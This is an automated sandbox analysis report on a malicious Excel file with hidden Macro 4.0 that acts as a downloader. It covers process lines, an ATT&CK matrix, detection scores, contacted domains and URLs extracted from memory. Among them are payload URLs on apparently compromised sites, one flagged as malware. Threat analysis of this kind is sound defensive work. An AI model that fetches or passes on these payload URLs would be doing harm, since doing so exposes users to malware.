Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.586898522.000000000FC59000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455317747.000000000FC4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253397302.000000000FC4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426850234.000000000FC59000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451458042.000000000FC59000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436686199.000000000FC4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586833993.000000000FC4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426839523.000000000FC4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.449892182.000000000FC59000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.584781920.000000000DD84000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253404947.000000000FC59000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436707377.000000000FC59000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match	File source: counter-1248368226.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED

Source: EXCEL.EXE, 00000000.00000002.579340575.0000000003460000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.579340575.0000000003460000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: EXCEL.EXE, 00000000.00000002.579340575.0000000003460000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: EXCEL.EXE, 00000000.00000002.579340575.0000000003460000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: EXCEL.EXE, 00000000.00000002.579340575.0000000003460000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	DLL Side-Loading1	Process Injection2	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
counter-1248368226.xls	41%	ReversingLabs	Document-Excel.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
greenflag.esp.br	1%	Virustotal	Browse
playsis.com.br	1%	Virustotal	Browse
noithat117.vn	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://incidents.diagnosticssdf.office.comq	0%	Avira URL Cloud	safe
https://o365auditrealtimeingestion.manage.office.comBearer	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://schemas.open	0%	URL Reputation	safe
https://dataservice.o365filtering.com8Q	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://noithat117.vn/TSh7GBeIR/tiynh.htmlx	0%	Avira URL Cloud	safe
https://playsis.com.br/qJSL1BN5V/tiynh.html	100%	Avira URL Cloud	malware
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer	0%	Avira URL Cloud	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://substrate.office.comk	0%	Avira URL Cloud	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://noithat117.vn/N_k	0%	Avira URL Cloud	safe
https://api.onedrive.comMBI	0%	Avira URL Cloud	safe
https://greenflag.esp.br/yuINdRbM/tiynh.html	0%	Avira URL Cloud	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.	0%	Avira URL Cloud	safe
https://api.cortana.aiL	0%	Avira URL Cloud	safe
https://api.cortana.aiP	0%	Avira URL Cloud	safe
https://substrate.office.comP	0%	Avira URL Cloud	safe
https://devnull.onenote.comMBI_SSL_SHORT	0%	Avira URL Cloud	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://greenflag.esp./	0%	Avira URL Cloud	safe
https://www.odwebp.svc.msom	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
greenflag.esp.br	108.179.192.98	true	false	1%, Virustotal, Browse	unknown
playsis.com.br	162.241.2.78	true	false	1%, Virustotal, Browse	unknown
noithat117.vn	103.28.36.171	true	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://playsis.com.br/qJSL1BN5V/tiynh.html	true	Avira URL Cloud: malware	unknown
https://greenflag.esp.br/yuINdRbM/tiynh.html	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/autodiscover/autodiscover.jsone	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://shell.suite.office.com:1443	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://incidents.diagnosticssdf.office.comq	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/	EXCEL.EXE, 00000000.00000003.449854061.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426807499.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436557728.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586689452.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458047571.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253364496.000000000FC27000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.comBearer	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://cdn.entity.	62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
http://schemas.open	EXCEL.EXE, 00000000.00000003.428823718.0000000016820000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419599791.000000001682B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428771441.00000000167F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.419659022.0000000016886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428911017.0000000016873000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://dataservice.o365filtering.com8Q	EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.	EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	false		high
https://api.aadrm.com/	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false_J	EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	EXCEL.EXE, 00000000.00000002.586543409.000000000FBA0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://api.microsoftstream.com/api/	EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://cr.office.com	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://noithat117.vn/TSh7GBeIR/tiynh.htmlx	EXCEL.EXE, 00000000.00000003.487737104.0000000013176000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false	URL Reputation: safe	unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://tasks.office.com	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://api.addins.omex.office.net/appinfo/queryU	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
